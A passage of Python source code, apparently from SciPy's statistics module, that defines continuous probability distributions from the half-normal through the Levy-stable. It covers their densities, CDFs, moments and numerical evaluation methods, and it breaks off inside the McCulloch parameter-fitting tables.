np.sqrt(2)*(4-np.pi)/(np.pi-2)**1.5,
8*(np.pi-3)/(np.pi-2)**2)
def _entropy(self):
return 0.5*np.log(np.pi/2.0)+0.5
halfnorm = halfnorm_gen(a=0.0, name='halfnorm')
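# Sketch of the docstring note that halfnorm is chi with df=1 (value
# illustrative):
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.halfnorm.pdf(0.8), stats.chi.pdf(0.8, 1))
# True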
class hypsecant_gen(rv_continuous):
r"""A hyperbolic secant continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `hypsecant` is:
.. math::
f(x) = \frac{1}{\pi} \text{sech}(x)
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# hypsecant.pdf(x) = 1/pi * sech(x)
return 1.0/(np.pi*np.cosh(x))
def _cdf(self, x):
return 2.0/np.pi*np.arctan(np.exp(x))
def _ppf(self, q):
return np.log(np.tan(np.pi*q/2.0))
def _stats(self):
return 0, np.pi*np.pi/4, 0, 2
def _entropy(self):
return np.log(2*np.pi)
hypsecant = hypsecant_gen(name='hypsecant')
class gausshyper_gen(rv_continuous):
r"""A Gauss hypergeometric continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `gausshyper` is:
.. math::
f(x, a, b, c, z) = C x^{a-1} (1-x)^{b-1} (1+zx)^{-c}
for :math:`0 \le x \le 1`, :math:`a > 0`, :math:`b > 0`, and
:math:`C = \frac{1}{B(a, b) F[2, 1](c, a; a+b; -z)}`.
:math:`F[2, 1]` is the Gauss hypergeometric function
`scipy.special.hyp2f1`.
`gausshyper` takes :math:`a`, :math:`b`, :math:`c` and :math:`z` as shape
parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, b, c, z):
return (a > 0) & (b > 0) & (c == c) & (z == z)
def _pdf(self, x, a, b, c, z):
# gausshyper.pdf(x, a, b, c, z) =
# C * x**(a-1) * (1-x)**(b-1) * (1+z*x)**(-c)
Cinv = sc.gamma(a)*sc.gamma(b)/sc.gamma(a+b)*sc.hyp2f1(c, a, a+b, -z)
return 1.0/Cinv * x**(a-1.0) * (1.0-x)**(b-1.0) / (1.0+z*x)**c
def _munp(self, n, a, b, c, z):
fac = sc.beta(n+a, b) / sc.beta(a, b)
num = sc.hyp2f1(c, a+n, a+b+n, -z)
den = sc.hyp2f1(c, a, a+b, -z)
return fac*num / den
gausshyper = gausshyper_gen(a=0.0, b=1.0, name='gausshyper')
class invgamma_gen(rv_continuous):
r"""An inverted gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invgamma` is:
.. math::
f(x, a) = \frac{x^{-a-1}}{\Gamma(a)} \exp(-\frac{1}{x})
for :math:`x >= 0`, :math:`a > 0`. :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
`invgamma` takes ``a`` as a shape parameter for :math:`a`.
`invgamma` is a special case of `gengamma` with ``c=-1``.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x, a):
# invgamma.pdf(x, a) = x**(-a-1) / gamma(a) * exp(-1/x)
return np.exp(self._logpdf(x, a))
def _logpdf(self, x, a):
return -(a+1) * np.log(x) - sc.gammaln(a) - 1.0/x
def _cdf(self, x, a):
return sc.gammaincc(a, 1.0 / x)
def _ppf(self, q, a):
return 1.0 / sc.gammainccinv(a, q)
def _sf(self, x, a):
return sc.gammainc(a, 1.0 / x)
def _isf(self, q, a):
return 1.0 / sc.gammaincinv(a, q)
def _stats(self, a, moments='mvsk'):
m1 = _lazywhere(a > 1, (a,), lambda x: 1. / (x - 1.), np.inf)
m2 = _lazywhere(a > 2, (a,), lambda x: 1. / (x - 1.)**2 / (x - 2.),
np.inf)
g1, g2 = None, None
if 's' in moments:
g1 = _lazywhere(
a > 3, (a,),
lambda x: 4. * np.sqrt(x - 2.) / (x - 3.), np.nan)
if 'k' in moments:
g2 = _lazywhere(
a > 4, (a,),
lambda x: 6. * (5. * x - 11.) / (x - 3.) / (x - 4.), np.nan)
return m1, m2, g1, g2
def _entropy(self, a):
return a - (a+1.0) * sc.psi(a) + sc.gammaln(a)
invgamma = invgamma_gen(a=0.0, name='invgamma')
# scale is gamma from DATAPLOT and B from Regress
class invgauss_gen(rv_continuous):
r"""An inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `invgauss` is:
.. math::
f(x, \mu) = \frac{1}{\sqrt{2 \pi x^3}}
\exp(-\frac{(x-\mu)^2}{2 x \mu^2})
for :math:`x >= 0` and :math:`\mu > 0`.
`invgauss` takes ``mu`` as a shape parameter for :math:`\mu`.
%(after_notes)s
When :math:`\mu` is too small, evaluating the cumulative distribution
function will be inaccurate due to ``cdf(mu -> 0) = inf * 0``.
NaNs are returned for :math:`\mu \le 0.0028`.
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self, mu):
return self._random_state.wald(mu, 1.0, size=self._size)
def _pdf(self, x, mu):
# invgauss.pdf(x, mu) =
# 1 / sqrt(2*pi*x**3) * exp(-(x-mu)**2/(2*x*mu**2))
return 1.0/np.sqrt(2*np.pi*x**3.0)*np.exp(-1.0/(2*x)*((x-mu)/mu)**2)
def _logpdf(self, x, mu):
return -0.5*np.log(2*np.pi) - 1.5*np.log(x) - ((x-mu)/mu)**2/(2*x)
def _cdf(self, x, mu):
fac = np.sqrt(1.0/x)
# Numerical accuracy for small `mu` is bad. See #869.
C1 = _norm_cdf(fac*(x-mu)/mu)
C1 += np.exp(1.0/mu) * _norm_cdf(-fac*(x+mu)/mu) * np.exp(1.0/mu)
return C1
def _stats(self, mu):
return mu, mu**3.0, 3*np.sqrt(mu), 15*mu
invgauss = invgauss_gen(a=0.0, name='invgauss')
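# Small check of the _stats formulas above: the mean of invgauss(mu) is mu
# itself (value illustrative):
#
# >>> from scipy import stats
# >>> stats.invgauss.mean(2.0)
# 2.0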
class norminvgauss_gen(rv_continuous):
r"""A Normal Inverse Gaussian continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `norminvgauss` is:
.. math::
f(x, a, b) = (a \exp(\sqrt{a^2 - b^2} + b x)) /
(\pi \sqrt{1 + x^2} \, K_1(a \sqrt{1 + x^2}))
where :math:`x` is a real number, the parameter :math:`a` is the tail
heaviness and :math:`b` is the asymmetry parameter satisfying
:math:`a > 0` and :math:`|b| <= a`.
:math:`K_1` is the modified Bessel function of second kind
(`scipy.special.k1`).
%(after_notes)s
A normal inverse Gaussian random variable `Y` with parameters `a` and `b`
can be expressed as a normal mean-variance mixture:
`Y = b * V + sqrt(V) * X` where `X` is `norm(0,1)` and `V` is
`invgauss(mu=1/sqrt(a**2 - b**2))`. This representation is used
to generate random variates.
References
----------
O. Barndorff-Nielsen, "Hyperbolic Distributions and Distributions on
Hyperbolae", Scandinavian Journal of Statistics, Vol. 5(3),
pp. 151-157, 1978.
O. Barndorff-Nielsen, "Normal Inverse Gaussian Distributions and Stochastic
Volatility Modelling", Scandinavian Journal of Statistics, Vol. 24,
pp. 1-13, 1997.
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _argcheck(self, a, b):
return (a > 0) & (np.absolute(b) < a)
def _pdf(self, x, a, b):
gamma = np.sqrt(a**2 - b**2)
fac1 = a / np.pi * np.exp(gamma)
sq = np.hypot(1, x) # reduce overflows
return fac1 * sc.k1e(a * sq) * np.exp(b*x - a*sq) / sq
def _rvs(self, a, b):
        # note: Y = b * V + sqrt(V) * X is norminvgauss(a, b) if X is a
        # standard normal and V is invgauss(mu=1/sqrt(a**2 - b**2))
gamma = np.sqrt(a**2 - b**2)
sz, rndm = self._size, self._random_state
ig = invgauss.rvs(mu=1/gamma, size=sz, random_state=rndm)
return b * ig + np.sqrt(ig) * norm.rvs(size=sz, random_state=rndm)
def _stats(self, a, b):
gamma = np.sqrt(a**2 - b**2)
mean = b / gamma
variance = a**2 / gamma**3
skewness = 3.0 * b / (a * np.sqrt(gamma))
kurtosis = 3.0 * (1 + 4 * b**2 / a**2) / gamma
return mean, variance, skewness, kurtosis
norminvgauss = norminvgauss_gen(name="norminvgauss")
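# Numeric sketch of the mixture representation noted in the docstring: the
# analytic mean is b / sqrt(a**2 - b**2) (parameters illustrative):
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.isclose(stats.norminvgauss.mean(2.0, 1.0), 1.0 / np.sqrt(3.0))
# True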
class invweibull_gen(rv_continuous):
u"""An inverted Weibull continuous random variable.
This distribution is also known as the Fréchet distribution or the
type II extreme value distribution.
%(before_notes)s
Notes
-----
The probability density function for `invweibull` is:
.. math::
f(x, c) = c x^{-c-1} \\exp(-x^{-c})
for :math:`x > 0`, :math:`c > 0`.
`invweibull` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
References
----------
F.R.S. de Gusmao, E.M.M Ortega and G.M. Cordeiro, "The generalized inverse
Weibull distribution", Stat. Papers, vol. 52, pp. 591-619, 2011.
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x, c):
# invweibull.pdf(x, c) = c * x**(-c-1) * exp(-x**(-c))
xc1 = np.power(x, -c - 1.0)
xc2 = np.power(x, -c)
xc2 = np.exp(-xc2)
return c * xc1 * xc2
def _cdf(self, x, c):
xc1 = np.power(x, -c)
return np.exp(-xc1)
def _ppf(self, q, c):
return np.power(-np.log(q), -1.0/c)
def _munp(self, n, c):
return sc.gamma(1 - n / c)
def _entropy(self, c):
return 1+_EULER + _EULER / c - np.log(c)
invweibull = invweibull_gen(a=0, name='invweibull')
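# Reciprocal-relation sketch (a standard fact, illustrative values): if
# X ~ weibull_min(c) then 1/X ~ invweibull(c), so
# invweibull.cdf(x, c) == weibull_min.sf(1/x, c):
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.invweibull.cdf(1.7, 2.0),
# ...             stats.weibull_min.sf(1 / 1.7, 2.0))
# True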
class johnsonsb_gen(rv_continuous):
r"""A Johnson SB continuous random variable.
%(before_notes)s
See Also
--------
johnsonsu
Notes
-----
The probability density function for `johnsonsb` is:
.. math::
f(x, a, b) = \frac{b}{x(1-x)} \phi(a + b \log \frac{x}{1-x} )
    for :math:`0 <= x <= 1` and :math:`a, b > 0`, and :math:`\phi` is the normal
pdf.
`johnsonsb` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _argcheck(self, a, b):
return (b > 0) & (a == a)
def _pdf(self, x, a, b):
# johnsonsb.pdf(x, a, b) = b / (x*(1-x)) * phi(a + b * log(x/(1-x)))
trm = _norm_pdf(a + b*np.log(x/(1.0-x)))
return b*1.0/(x*(1-x))*trm
def _cdf(self, x, a, b):
return _norm_cdf(a + b*np.log(x/(1.0-x)))
def _ppf(self, q, a, b):
return 1.0 / (1 + np.exp(-1.0 / b * (_norm_ppf(q) - a)))
johnsonsb = johnsonsb_gen(a=0.0, b=1.0, name='johnsonsb')
class johnsonsu_gen(rv_continuous):
r"""A Johnson SU continuous random variable.
%(before_notes)s
See Also
--------
johnsonsb
Notes
-----
The probability density function for `johnsonsu` is:
.. math::
f(x, a, b) = \frac{b}{\sqrt{x^2 + 1}}
\phi(a + b \log(x + \sqrt{x^2 + 1}))
    for all real :math:`x` and :math:`a, b > 0`, where :math:`\phi` is the normal pdf.
`johnsonsu` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, b):
return (b > 0) & (a == a)
def _pdf(self, x, a, b):
# johnsonsu.pdf(x, a, b) = b / sqrt(x**2 + 1) *
# phi(a + b * log(x + sqrt(x**2 + 1)))
x2 = x*x
trm = _norm_pdf(a + b * np.log(x + np.sqrt(x2+1)))
return b*1.0/np.sqrt(x2+1.0)*trm
def _cdf(self, x, a, b):
return _norm_cdf(a + b * np.log(x + np.sqrt(x*x + 1)))
def _ppf(self, q, a, b):
return np.sinh((_norm_ppf(q) - a) / b)
johnsonsu = johnsonsu_gen(name='johnsonsu')
class laplace_gen(rv_continuous):
r"""A Laplace continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `laplace` is
.. math::
f(x) = \frac{1}{2} \exp(-|x|)
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.laplace(0, 1, size=self._size)
def _pdf(self, x):
# laplace.pdf(x) = 1/2 * exp(-abs(x))
return 0.5*np.exp(-abs(x))
def _cdf(self, x):
return np.where(x > 0, 1.0-0.5*np.exp(-x), 0.5*np.exp(x))
def _ppf(self, q):
return np.where(q > 0.5, -np.log(2*(1-q)), np.log(2*q))
def _stats(self):
return 0, 2, 0, 3
def _entropy(self):
return np.log(2)+1
laplace = laplace_gen(name='laplace')
class levy_gen(rv_continuous):
r"""A Levy continuous random variable.
%(before_notes)s
See Also
--------
levy_stable, levy_l
Notes
-----
The probability density function for `levy` is:
.. math::
f(x) = \frac{1}{\sqrt{2\pi x^3}} \exp\left(-\frac{1}{2x}\right)
for :math:`x >= 0`.
This is the same as the Levy-stable distribution with :math:`a=1/2` and
:math:`b=1`.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x):
# levy.pdf(x) = 1 / (x * sqrt(2*pi*x)) * exp(-1/(2*x))
return 1 / np.sqrt(2*np.pi*x) / x * np.exp(-1/(2*x))
def _cdf(self, x):
# Equivalent to 2*norm.sf(np.sqrt(1/x))
return sc.erfc(np.sqrt(0.5 / x))
def _ppf(self, q):
# Equivalent to 1.0/(norm.isf(q/2)**2) or 0.5/(erfcinv(q)**2)
val = -sc.ndtri(q/2)
return 1.0 / (val * val)
def _stats(self):
return np.inf, np.inf, np.nan, np.nan
levy = levy_gen(a=0.0, name="levy")
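# Sketch verifying the identity quoted in the _cdf comment above (value
# illustrative):
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.levy.cdf(2.0), 2 * stats.norm.sf(np.sqrt(1 / 2.0)))
# True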
class levy_l_gen(rv_continuous):
r"""A left-skewed Levy continuous random variable.
%(before_notes)s
See Also
--------
levy, levy_stable
Notes
-----
The probability density function for `levy_l` is:
.. math::
f(x) = \frac{1}{|x| \sqrt{2\pi |x|}} \exp{ \left(-\frac{1}{2|x|} \right)}
for :math:`x <= 0`.
This is the same as the Levy-stable distribution with :math:`a=1/2` and
:math:`b=-1`.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x):
# levy_l.pdf(x) = 1 / (abs(x) * sqrt(2*pi*abs(x))) * exp(-1/(2*abs(x)))
ax = abs(x)
return 1/np.sqrt(2*np.pi*ax)/ax*np.exp(-1/(2*ax))
def _cdf(self, x):
ax = abs(x)
return 2 * _norm_cdf(1 / np.sqrt(ax)) - 1
def _ppf(self, q):
val = _norm_ppf((q + 1.0) / 2)
return -1.0 / (val * val)
def _stats(self):
return np.inf, np.inf, np.nan, np.nan
levy_l = levy_l_gen(b=0.0, name="levy_l")
class levy_stable_gen(rv_continuous):
r"""A Levy-stable continuous random variable.
%(before_notes)s
See Also
--------
levy, levy_l
Notes
-----
The distribution for `levy_stable` has characteristic function:
.. math::
\varphi(t, \alpha, \beta, c, \mu) =
e^{it\mu -|ct|^{\alpha}(1-i\beta \operatorname{sign}(t)\Phi(\alpha, t))}
where:
.. math::
\Phi = \begin{cases}
\tan \left({\frac {\pi \alpha }{2}}\right)&\alpha \neq 1\\
-{\frac {2}{\pi }}\log |t|&\alpha =1
\end{cases}
The probability density function for `levy_stable` is:
.. math::
f(x) = \frac{1}{2\pi}\int_{-\infty}^\infty \varphi(t)e^{-ixt}\,dt
where :math:`-\infty < t < \infty`. This integral does not have a known closed form.
    For evaluation of the pdf we use either the Zolotarev :math:`S_0` parameterization with
    integration, direct integration of the standard parameterization of the characteristic
    function, or an FFT of the characteristic function. If ``levy_stable.pdf_fft_min_points_threshold``
    is set to a value other than None (its default) and the number of points is greater than that
    threshold, we use the FFT; otherwise we use one of the other methods.
    The default method is 'best', which uses Zolotarev's method unless ``alpha == 1`` and
    ``beta != 0`` (where that method is unstable), in which case it integrates the
    characteristic function. The default method can be changed by setting
    ``levy_stable.pdf_default_method`` to either 'zolotarev', 'quadrature' or 'best'.
To increase accuracy of FFT calculation one can specify ``levy_stable.pdf_fft_grid_spacing``
(defaults to 0.001) and ``pdf_fft_n_points_two_power`` (defaults to a value that covers the
input range * 4). Setting ``pdf_fft_n_points_two_power`` to 16 should be sufficiently accurate
in most cases at the expense of CPU time.
    For evaluation of the cdf we use the Zolotarev :math:`S_0` parameterization with integration
    or the integral of the pdf FFT interpolated spline. The settings affecting FFT calculation
    are the same as for pdf calculation. Setting the threshold to ``None`` (default) will disable
    FFT. For cdf calculations the Zolotarev method is superior in accuracy, so FFT is disabled by
    default.
    Fitting uses the quantile estimation method of [MC]. MLE estimation of the parameters in the
    fit method uses this quantile estimate as its initial guess. Note that MLE doesn't always
    converge if using FFT for pdf calculations; so it's best that ``pdf_fft_min_points_threshold``
    is left unset.
.. warning::
        For pdf calculations the implementation of the Zolotarev method is unstable for values
        where alpha = 1 and beta != 0. In this case the quadrature method is recommended. FFT
        calculation is also considered experimental.
        For cdf calculations FFT calculation is considered experimental. Use the Zolotarev
        method instead (default).
%(after_notes)s
References
----------
    .. [MC] McCulloch, J., 1986. Simple consistent estimators of stable distribution parameters.
       Communications in Statistics - Simulation and Computation 15, 1109-1136.
.. [MS] Mittnik, S.T. Rachev, T. Doganoglu, D. Chenyao, 1999. Maximum likelihood estimation
of stable Paretian models, Mathematical and Computer Modelling, Volume 29, Issue 10,
1999, Pages 275-293.
    .. [BS] Borak, S., Hardle, W., Weron, R., 2005. Stable distributions. Economic Risk.
%(example)s
"""
def _rvs(self, alpha, beta):
def alpha1func(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W):
return (2/np.pi*(np.pi/2 + bTH)*tanTH -
beta*np.log((np.pi/2*W*cosTH)/(np.pi/2 + bTH)))
def beta0func(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W):
return (W/(cosTH/np.tan(aTH) + np.sin(TH)) *
((np.cos(aTH) + np.sin(aTH)*tanTH)/W)**(1.0/alpha))
def otherwise(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W):
# alpha is not 1 and beta is not 0
val0 = beta*np.tan(np.pi*alpha/2)
th0 = np.arctan(val0)/alpha
val3 = W/(cosTH/np.tan(alpha*(th0 + TH)) + np.sin(TH))
res3 = val3*((np.cos(aTH) + np.sin(aTH)*tanTH -
val0*(np.sin(aTH) - np.cos(aTH)*tanTH))/W)**(1.0/alpha)
return res3
def alphanot1func(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W):
res = _lazywhere(beta == 0,
(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W),
beta0func, f2=otherwise)
return res
sz = self._size
alpha = broadcast_to(alpha, sz)
beta = broadcast_to(beta, sz)
TH = uniform.rvs(loc=-np.pi/2.0, scale=np.pi, size=sz,
random_state=self._random_state)
W = expon.rvs(size=sz, random_state=self._random_state)
aTH = alpha*TH
bTH = beta*TH
cosTH = np.cos(TH)
tanTH = np.tan(TH)
res = _lazywhere(alpha == 1,
(alpha, beta, TH, aTH, bTH, cosTH, tanTH, W),
alpha1func, f2=alphanot1func)
return res
def _argcheck(self, alpha, beta):
return (alpha > 0) & (alpha <= 2) & (beta <= 1) & (beta >= -1)
@staticmethod
def _cf(t, alpha, beta):
Phi = lambda alpha, t: np.tan(np.pi*alpha/2) if alpha != 1 else -2.0*np.log(np.abs(t))/np.pi
return np.exp(-(np.abs(t)**alpha)*(1-1j*beta*np.sign(t)*Phi(alpha, t)))
@staticmethod
def _pdf_from_cf_with_fft(cf, h=0.01, q=9):
"""Calculates pdf from cf using fft. Using region around 0 with N=2**q points
separated by distance h. As suggested by [MS].
"""
N = 2**q
n = np.arange(1,N+1)
density = ((-1)**(n-1-N/2))*np.fft.fft(((-1)**(n-1))*cf(2*np.pi*(n-1-N/2)/h/N))/h/N
x = (n-1-N/2)*h
return (x, density)
@staticmethod
def _pdf_single_value_best(x, alpha, beta):
if alpha != 1. or (alpha == 1. and beta == 0.):
return levy_stable_gen._pdf_single_value_zolotarev(x, alpha, beta)
else:
return levy_stable_gen._pdf_single_value_cf_integrate(x, alpha, beta)
@staticmethod
def _pdf_single_value_cf_integrate(x, alpha, beta):
cf = lambda t: levy_stable_gen._cf(t, alpha, beta)
return integrate.quad(lambda t: np.real(np.exp(-1j*t*x)*cf(t)), -np.inf, np.inf, limit=1000)[0]/np.pi/2
@staticmethod
def _pdf_single_value_zolotarev(x, alpha, beta):
"""Calculate pdf using Zolotarev's methods as detailed in [BS].
"""
zeta = -beta*np.tan(np.pi*alpha/2.)
if alpha != 1:
x0 = x + zeta # convert to S_0 parameterization
xi = np.arctan(-zeta)/alpha
def V(theta):
return np.cos(alpha*xi)**(1/(alpha-1)) * \
(np.cos(theta)/np.sin(alpha*(xi+theta)))**(alpha/(alpha-1)) * \
(np.cos(alpha*xi+(alpha-1)*theta)/np.cos(theta))
if x0 > zeta:
def g(theta):
                    return V(theta)*np.real(complex(x0-zeta)**(alpha/(alpha-1)))
def f(theta):
return g(theta) * np.exp(-g(theta))
# spare calculating integral on null set
# use isclose as macos has fp differences
if np.isclose(-xi, np.pi/2, rtol=1e-014, atol=1e-014):
return 0.
with np.errstate(all="ignore"):
intg_max = optimize.minimize_scalar(lambda theta: -f(theta), bounds=[-xi, np.pi/2])
intg_kwargs = {}
# windows quadpack less forgiving with points out of bounds
if intg_max.success and not np.isnan(intg_max.fun)\
and intg_max.x > -xi and intg_max.x < np.pi/2:
intg_kwargs["points"] = [intg_max.x]
intg = integrate.quad(f, -xi, np.pi/2, **intg_kwargs)[0]
return alpha * intg / np.pi / np.abs(alpha-1) / (x0-zeta)
elif x0 == zeta:
return sc.gamma(1+1/alpha)*np.cos(xi)/np.pi/((1+zeta**2)**(1/alpha/2))
else:
return levy_stable_gen._pdf_single_value_zolotarev(-x, alpha, -beta)
else:
# since location zero, no need to reposition x for S_0 parameterization
xi = np.pi/2
if beta != 0:
warnings.warn('Density calculation unstable for alpha=1 and beta!=0.' +
' Use quadrature method instead.', RuntimeWarning)
def V(theta):
expr_1 = np.pi/2+beta*theta
return 2. * expr_1 * np.exp(expr_1*np.tan(theta)/beta) / np.cos(theta) / np.pi
def g(theta):
return np.exp(-np.pi * x / 2. / beta) * V(theta)
def f(theta):
return g(theta) * np.exp(-g(theta))
with np.errstate(all="ignore"):
intg_max = optimize.minimize_scalar(lambda theta: -f(theta), bounds=[-np.pi/2, np.pi/2])
intg = integrate.fixed_quad(f, -np.pi/2, intg_max.x)[0] + integrate.fixed_quad(f, intg_max.x, np.pi/2)[0]
return intg / np.abs(beta) / 2.
else:
return 1/(1+x**2)/np.pi
@staticmethod
def _cdf_single_value_zolotarev(x, alpha, beta):
"""Calculate cdf using Zolotarev's methods as detailed in [BS].
"""
zeta = -beta*np.tan(np.pi*alpha/2.)
if alpha != 1:
x0 = x + zeta # convert to S_0 parameterization
xi = np.arctan(-zeta)/alpha
def V(theta):
return np.cos(alpha*xi)**(1/(alpha-1)) * \
(np.cos(theta)/np.sin(alpha*(xi+theta)))**(alpha/(alpha-1)) * \
(np.cos(alpha*xi+(alpha-1)*theta)/np.cos(theta))
if x0 > zeta:
c_1 = 1 if alpha > 1 else .5 - xi/np.pi
def f(theta):
                    return np.exp(-V(theta)*np.real(complex(x0-zeta)**(alpha/(alpha-1))))
with np.errstate(all="ignore"):
# spare calculating integral on null set
# use isclose as macos has fp differences
if np.isclose(-xi, np.pi/2, rtol=1e-014, atol=1e-014):
intg = 0
else:
intg = integrate.quad(f, -xi, np.pi/2)[0]
return c_1 + np.sign(1-alpha) * intg / np.pi
elif x0 == zeta:
return .5 - xi/np.pi
else:
return 1 - levy_stable_gen._cdf_single_value_zolotarev(-x, alpha, -beta)
else:
# since location zero, no need to reposition x for S_0 parameterization
xi = np.pi/2
if beta > 0:
def V(theta):
expr_1 = np.pi/2+beta*theta
return 2. * expr_1 * np.exp(expr_1*np.tan(theta)/beta) / np.cos(theta) / np.pi
with np.errstate(all="ignore"):
expr_1 = np.exp(-np.pi*x/beta/2.)
int_1 = integrate.quad(lambda theta: np.exp(-expr_1 * V(theta)), -np.pi/2, np.pi/2)[0]
return int_1 / np.pi
elif beta == 0:
return .5 + np.arctan(x)/np.pi
else:
return 1 - levy_stable_gen._cdf_single_value_zolotarev(-x, 1, -beta)
def _pdf(self, x, alpha, beta):
x = np.asarray(x).reshape(1, -1)[0,:]
x, alpha, beta = np.broadcast_arrays(x, alpha, beta)
data_in = np.dstack((x, alpha, beta))[0]
data_out = np.empty(shape=(len(data_in),1))
pdf_default_method_name = getattr(self, 'pdf_default_method', 'best')
if pdf_default_method_name == 'best':
pdf_single_value_method = levy_stable_gen._pdf_single_value_best
elif pdf_default_method_name == 'zolotarev':
pdf_single_value_method = levy_stable_gen._pdf_single_value_zolotarev
else:
pdf_single_value_method = levy_stable_gen._pdf_single_value_cf_integrate
fft_min_points_threshold = getattr(self, 'pdf_fft_min_points_threshold', None)
fft_grid_spacing = getattr(self, 'pdf_fft_grid_spacing', 0.001)
fft_n_points_two_power = getattr(self, 'pdf_fft_n_points_two_power', None)
# group data in unique arrays of alpha, beta pairs
uniq_param_pairs = np.vstack(list({tuple(row) for row in
data_in[:, 1:]}))
for pair in uniq_param_pairs:
data_mask = np.all(data_in[:,1:] == pair, axis=-1)
data_subset = data_in[data_mask]
if fft_min_points_threshold is None or len(data_subset) < fft_min_points_threshold:
data_out[data_mask] = np.array([pdf_single_value_method(_x, _alpha, _beta)
for _x, _alpha, _beta in data_subset]).reshape(len(data_subset), 1)
else:
                warnings.warn('Density calculations experimental for FFT '
                              'method. Use combination of Zolotarev and '
                              'quadrature methods instead.', RuntimeWarning)
_alpha, _beta = pair
_x = data_subset[:,(0,)]
# need enough points to "cover" _x for interpolation
h = fft_grid_spacing
q = np.ceil(np.log(2*np.max(np.abs(_x))/h)/np.log(2)) + 2 if fft_n_points_two_power is None else int(fft_n_points_two_power)
density_x, density = levy_stable_gen._pdf_from_cf_with_fft(lambda t: levy_stable_gen._cf(t, _alpha, _beta), h=h, q=q)
f = interpolate.interp1d(density_x, np.real(density))
data_out[data_mask] = f(_x)
return data_out.T[0]
def _cdf(self, x, alpha, beta):
x = np.asarray(x).reshape(1, -1)[0,:]
x, alpha, beta = np.broadcast_arrays(x, alpha, beta)
data_in = np.dstack((x, alpha, beta))[0]
data_out = np.empty(shape=(len(data_in),1))
fft_min_points_threshold = getattr(self, 'pdf_fft_min_points_threshold', None)
fft_grid_spacing = getattr(self, 'pdf_fft_grid_spacing', 0.001)
fft_n_points_two_power = getattr(self, 'pdf_fft_n_points_two_power', None)
# group data in unique arrays of alpha, beta pairs
uniq_param_pairs = np.vstack(
list({tuple(row) for row in data_in[:,1:]}))
for pair in uniq_param_pairs:
data_mask = np.all(data_in[:,1:] == pair, axis=-1)
data_subset = data_in[data_mask]
if fft_min_points_threshold is None or len(data_subset) < fft_min_points_threshold:
                data_out[data_mask] = np.array([levy_stable_gen._cdf_single_value_zolotarev(_x, _alpha, _beta)
                                                for _x, _alpha, _beta in data_subset]).reshape(len(data_subset), 1)
else:
                warnings.warn('FFT method is considered experimental for '
                              'cumulative distribution function '
                              "evaluations. Use Zolotarev's method instead "
                              '(default).', RuntimeWarning)
_alpha, _beta = pair
_x = data_subset[:,(0,)]
# need enough points to "cover" _x for interpolation
h = fft_grid_spacing
q = 16 if fft_n_points_two_power is None else int(fft_n_points_two_power)
density_x, density = levy_stable_gen._pdf_from_cf_with_fft(lambda t: levy_stable_gen._cf(t, _alpha, _beta), h=h, q=q)
f = interpolate.InterpolatedUnivariateSpline(density_x, np.real(density))
data_out[data_mask] = np.array([f.integral(self.a, x_1) for x_1 in _x]).reshape(data_out[data_mask].shape)
return data_out.T[0]
def _fitstart(self, data):
        # We follow McCulloch 1986 method - Simple Consistent Estimators
# of Stable Distribution Parameters
# Table III and IV
nu_alpha_range = [2.439, 2.5, 2.6, 2.7, 2.8, 3, 3.2, 3.5, 4, 5, 6, 8, 10, 15, 25]
nu_beta_range = [0, 0.1, 0.2, 0.3, 0.5, 0.7, 1]
# table III - alpha = psi_1(nu_alpha, nu_beta)
alpha_table = [
[2.000, 2.000, 2.000, 2.000, 2.000, 2.000, 2.000],
[1.916, 1.924, 1.924, 1.924, 1.924, 1.924, 1.924],
[1.808, 1.813, 1.829, 1.829, 1.829, 1.829, 1.829],
[1.729, 1.730, 1.737, 1.745, 1.745, 1.745, 1.745],
[1.664, 1.663, 1.663, 1.668, 1.676, 1.676, 1.676],
[1.563, 1.560, 1.553, 1.548, 1.547, 1.547, 1.547],
[1.484, 1.480, 1.471, 1.460, 1.448, 1.438, 1.438],
[1.391, 1.386, 1.378, 1.364, 1.337, 1.318, 1.318],
[1.279, 1.273, 1.266, 1.250, 1.210, 1.184, 1.150],
[1.128, 1.121, 1.114, 1.101, 1.067, 1.027, 0.973],
[1.029, 1.021, 1.014, 1.004, 0.974, 0.935, 0.874],
[0.896, 0.892, 0.884, 0.883, 0.855, 0.823, 0.769],
[0.818, 0.812, 0.806, 0.801, 0.780, 0.756, 0.691],
[0.698, 0.695, 0.692, 0.689, 0.676, 0.656, 0.597],
[0.593, 0.590, 0.588, 0.586, 0.579, 0.563, 0.513]]
# table IV - beta = psi_2(nu_alpha, nu_beta)
beta_table = [
[0, 2.160, 1.000, 1.000, 1.000, 1.000, 1.000],
[0, 1.592, 3.390, 1.000, 1.000, 1.000, 1.000],
[0, 0.759, 1.800, 1.000, 1.000, 1.000, 1.000],
[0, 0.482, 1.048, 1.694, 1.000, 1.000, 1.000],
[0, 0.360, 0.760, 1.232, 2.229, 1.000, 1.000],
